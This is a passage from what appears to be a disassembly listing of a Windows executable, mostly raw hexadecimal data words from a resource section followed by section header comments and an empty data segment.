dd 8B1F6757h, 832C0988h, 0D9D691BEh, 0F0F2D4E9h, 0C412B389h
dd 31D278F9h, 0B10BFFh, 2ED4B7CBh, 39866144h, 0DECB651Ah
dd 8CC08B98h, 0A0F1C13Dh, 0ADF62DC5h, 9840E2E2h, 0DB7E434Fh
dd 4917302Fh, 0B78F3B76h, 3FBD7416h, 5CAD1DE7h, 0CC4A9291h
dd 96D4B718h, 19BC4192h, 3A1ED9C5h, 10C3F68Bh, 0C5A29CCh
dd 673E1541h, 12D11117h, 2FFD3855h, 0C15B6698h, 18EB8699h
dd 8E8CDC12h, 4A25F0F2h, 0F6430B66h, 0E7D4A12Bh, 697E7950h
dd 6152DBE8h, 3F5083B2h, 42A5F6Eh, 94DE7001h, 4600DAD9h
dd 0E02CF5E7h, 0FCDAF994h, 723C3332h, 3785514Eh, 780FF893h
dd 0B53E8AB9h, 8EDCA636h, 0C12D4F93h, 5CE9B3E0h, 0E703D233h
dd 7108DC99h, 32E65134h, 0AB745656h, 5B985F1Ah, 0C546727Bh
dd 95D28D0Bh, 3FD6BFCAh, 0E03C4D62h, 78C55505h, 0A680F9Bh
dd 0A37A80BAh, 44925CD5h, 0EAA33AF2h, 0F1FC6896h, 0ABC91236h
dd 478317D0h, 0D623DEC0h, 0F52B0C66h, 84A02843h, 2E4C6B83h
dd 44669CE0h, 68B7E104h, 105E0D9Dh, 0A2C09B18h, 935FC8BDh
dd 0F29F600Ah, 3BCD1323h, 1926B43Fh, 880E4E4Dh, 52904BAEh
dd 1E558036h, 0E4255A52h, 0A9F7C255h, 4EF2F480h, 1A65D8C8h
dd 32632B8Fh, 0CDD1BA37h, 8D896474h, 0AFF49970h, 0E34E7171h
dd 93D08B14h, 0A495C8A2h, 9C1AE5E5h, 2AADFC50h, 8556110Ch
dd 0A8671A79h, 72A014CFh, 0E9A22877h, 588E1E9Eh, 910773A5h
dd 0A50585CCh, 9F33EEA6h, 0D67B0109h, 0BCA82Fh, 7D72A585h
dd 59B3266Ah, 0EBE44D81h, 0B3FD6326h, 0A0F251B8h, 902ED6D5h
dd 0F2088BC5h, 0C3663F31h, 38410A0Bh, 4BA43473h, 5AED4C48h
dd 23F2C9CFh, 758FA382h, 97DE252Ah, 69D65CDCh, 892FFAFAh
dd 531A4818h, 31ABA0CAh, 0B70C5262h, 57947A5Dh, 6F228CE6h
dd 0C0D360C2h, 0AEFBC32Eh, 0A83DC5E3h, 1661010Bh, 367FFA8Bh
dd 2FB5BF3Bh, 2885B208h, 5DAB767Dh, 5A102E1Fh, 0C4B2B09Fh
dd 99C35833h, 139AEADAh, 45B05C76h, 0D6B0ADAh, 3F4AE6C1h
dd 0CA95606Fh, 549C83F1h, 0EB01B199h, 0CDBAE6B6h, 90B4412Ch
dd 22A5F1C1h, 666B710Fh, 0A1EFD3A7h, 314F66B6h, 0E06E6AD6h
dd 83D994F6h, 772957FAh, 46E4CCDCh, 0C26756D3h, 2EA61213h
dd 43C6D83Dh, 1B5918CCh, 0CF01F5A3h, 0AAF0D786h, 42EC3A1Fh
dd 0E06028A7h, 0ADFAF5D1h, 0FA7FC895h, 1734FF8Ah, 357E7488h
dd 0DCD2BA3Ah, 3F8C6779h, 0D96E6500h, 79F6B137h, 96E3AEAEh
dd 9AFE4E0Dh, 3B1DE8D9h, 10C4F80Fh, 0C5DE679h, 789F4CCh
dd 0B9C55E6Eh, 539C76EEh, 7F351B98h, 9D5131BAh, 3E8ED2D2h
dd 0D914DFF3h, 9140D64h, 234C76BEh, 3FBDCD48h, 4D9AC1E1h
dd 3A77A982h, 0D7D7F5CFh, 0A499BDD6h, 94CED9D9h, 0CBDA6308h
dd 5CA1425h, 28E33DCDh, 0BE844F4Bh, 64916BE9h, 7A330489h
dd 3DB9696h, 9BC8D056h, 0A347B1E0h, 72CDADFEh, 4603709h
dd 2E92C0BAh, 3E8E55D2h, 0A4A71873h, 48F48825h, 847453ADh
dd 31FEF9E6h, 5414191Fh, 0ED3907ECh, 3A4CA7ABh, 0EE473F0Fh
dd 14C09F5Fh, 30AA1328h, 4ECC2369h, 0E17B383h, 0B935FB25h
dd 532D2D6Bh, 0F44008C9h, 94D7E01Ah, 2E4B7659h, 23C93232h
dd 68BA809Fh, 0C04762CDh, 27EF8A96h, 0BE88D817h, 5729F4F6h
dd 0CB773196h, 53EEF330h, 55D1F575h, 80AC6A6Ah, 9E4B4684h
dd 9504553h, 0A9C6F1EEh, 7F2F9555h, 0E530E030h, 0C34DCB29h
dd 0FE9CC7C0h, 0CAFD6DDh, 56667041h, 8FC4C639h, 0C0529C48h
dd 0F34BC8D0h, 87C9E7F1h, 0E81FC368h, 576FA1F0h, 0DC1C544Ah
dd 0C1C6442Eh, 2DAD7B0Dh, 40821F4Bh, 9AF2F33Ah, 0F38EDE8Ch
dd 0CD714A4h, 7705C829h, 0F6C173Ch, 68F21D87h, 0C11F6D45h
dd 66B37EC6h, 0B2135BA8h, 90C38F8Ah, 8F24E5FBh, 9753BCD3h
dd 89297E63h, 780A004Fh, 398D242Dh, 36F4544Bh, 8D7E4F7h
dd 0E9A5D182h, 0D39C9D82h, 0EA2BACA8h, 0A85AB7D5h, 7020796Ah
dd 73001A54h, 48A93E34h, 3E9C410Ch, 54E2BAB1h, 0E5B9C1DEh
dd 8ECBF8AEh, 0AB7E878Bh, 0D8087469h, 7F276D3Eh, 14D5E57h
dd 24FF373Ah, 6D900710h, 55FBACB0h, 0F696C9C6h, 0B83FA9A1h
dd 58E062E0h, 0C00C1C85h, 8E149525h, 848546ABh, 7815562Ah
dd 0AC33708h, 0A0D6DECh, 85663D48h, 0C08E3E3h, 0DFCC73CDh
dd 1936A0FDh, 614E13ACh, 3039C2BEh, 9144B943h, 24FABE5Ch
dd 60A0F9E4h, 4D0C96F2h, 0C30FD8F6h, 0E12CAF90h, 0FA24E16h
dd 6F97CCCEh, 2308DB70h, 0D8A25D5Dh, 0BD948BBEh, 0BCE02AE9h
dd 2B5D3739h, 0CB686C38h, 0CF864B72h, 0F6AD1C2Dh, 0EDE5FA9Eh
dd 82065DBCh, 5C985D8Bh, 4A1A1B6Dh, 0F7DE0167h, 0C9C3CCB9h
dd 0F130E59Fh, 9A6639ACh, 7F761FCFh, 5D757C9Dh, 0CEAFBEB5h
dd 312ABC7Bh, 7FCCA7A7h, 0D9B1F189h, 8734A5D1h, 0D871ADBCh
dd 0A642779h, 2F5FD5D5h, 2F31130Fh, 1CA47610h, 1DB6D1C9h
dd 0D592A395h, 26FFBBEBh
dd 3EF22699h, 0EF797008h, 0CFA31324h, 0E698AED8h, 0B80C5B1h
dd 10EE223Ch, 8E9A0C87h, 0DAE75A5Ah, 0A5B99781h, 37EAC35Bh
dd 0A566C102h, 87402828h, 0DF93C929h, 69DA0468h, 5C227E3Dh
dd 443C7171h, 69CE4377h, 35F23736h, 30E5181Fh, 0FAD0D137h
dd 0E1562121h, 0D98CC067h, 43905BB3h, 8D2C2578h, 7DFABCACh
dd 9AE6805Bh, 8AFBABCFh, 0E6025966h, 7A5B0A3Bh, 43E0A80Ah
dd 2C7A7575h, 0E47F6817h, 8E4B8081h, 84D19D8Fh, 0ECD038DFh
dd 0B78ED98Ch, 5628F3F5h, 24452D4Ch, 475FAE49h, 0CC044309h
dd 0A69E6969h, 4EBB90C5h, 0ED7A3A3h, 0A8F5C02Bh, 0C44E9E2Bh
dd 0E4CE7EF4h, 7FCC1819h, 3E4A1516h, 0EF035D73h, 0B0A46F70h
dd 8A3E712Ah, 92172BA5h, 0ED70C6C7h, 0DD5268ECh, 0EE45C029h
dd 2BFDF2Ch, 6EF8F43Fh, 6A0BD049h, 0B6AB4646h, 84376EC5h
dd 98E51F58h, 919F46CDh, 0D71FDADBh, 0C10D2394h, 0F235CE26h
dd 0AF77BCBCh, 489560EFh, 5591C8F6h, 0DC449AAAh, 7732B48Bh
dd 42F62983h, 91A78C80h, 0F8446F34h, 439CA6CDh, 0BF6B3049h
dd 7F8C67D2h, 7CC38784h, 89D05218h, 300E9BEh, 0C6F3DA6Ah
dd 0BC725C0Ah, 6D7A1945h, 1CEBB3B9h, 0B0E05151h, 0A95CF5FEh
dd 96106374h, 1B875757h, 0E7F9C98Fh, 0CD566FF2h, 611D432Bh
dd 553419Ah, 236FC3Ah, 1FAD7877h, 0D7823EFDh, 0FC4C82DBh
dd 96D49F89h, 0C70986F2h, 0DA5460EAh, 6C2C4506h, 875A7D47h
dd 19476DC4h, 4ED65E5Eh, 50E13F7Ah, 0A245FD4Ah, 0C5E939D1h
dd 8B0F6E51h, 0D625F0C0h, 9BF9A8Ah, 30D4D3D4h, 0CF7E7978h
dd 7DB70BF0h, 750D7C82h, 78D590AFh, 94D97029h, 0C98257D9h
dd 6D2CC7C7h, 0CD7A0680h, 703A6232h, 3030AF4Fh, 0ABA25D5Ch
dd 4193EF1Ch, 896958A6h, 54F9F4F3h, 0F93D2C75h, 188673FEh
dd 0FB512C32h, 115E3A8Ch, 0AB740056h, 5B985F2Eh, 48C23513h
dd 56E2AD9Dh, 0B2FFCA22h, 0D176BAE7h, 0C7D7E884h, 0FA002312h
dd 5FF08130h, 0C1926D49h, 0A92CB9B9h, 0BFC36769h, 0ABFCCC36h
dd 0A93B12D0h, 0A223C4EEh, 88C06A10h, 6033260Dh, 0C61C5433h
dd 0B4669BA7h, 335E84F5h, 6D2C6160h, 5D0F4468h, 0EDF2F6B6h
dd 0CC1EA38Dh, 0FB4836ABh, 0BD8E5130h, 407CB1B2h, 76E4E053h
dd 900805B7h, 7DA958Ah, 2891CA91h, 0B416D9E4h, 0E559AAD9h
dd 894FE51Ah, 4D6C5DF3h, 951CAB04h, 0DAA6415Dh, 4842864Ah
dd 0CFDF94F7h, 767ECBBDh, 33120DE1h, 94D0FCFCh, 69A9DEDFh
dd 250786FEh, 0F37B5B5Ah, 5FAD57CFh, 7CDA7D94h, 0B925B2B1h
dd 0B73477CEh, 0D6C9ECECh, 303F0A0Ah, 5BD02803h, 2B74960h
dd 35979AE2h, 665C1F67h, 8D19C9Bh, 0FDDE9DECh, 538ACC5Eh
dd 0DC18D844h, 6A816F9h, 12A64ED1h, 150Dh dup(0)
_rsrc ends
; Section 3. (virtual address 0001F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001F000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 41F000h
align 2000h
_idata2 ends
end start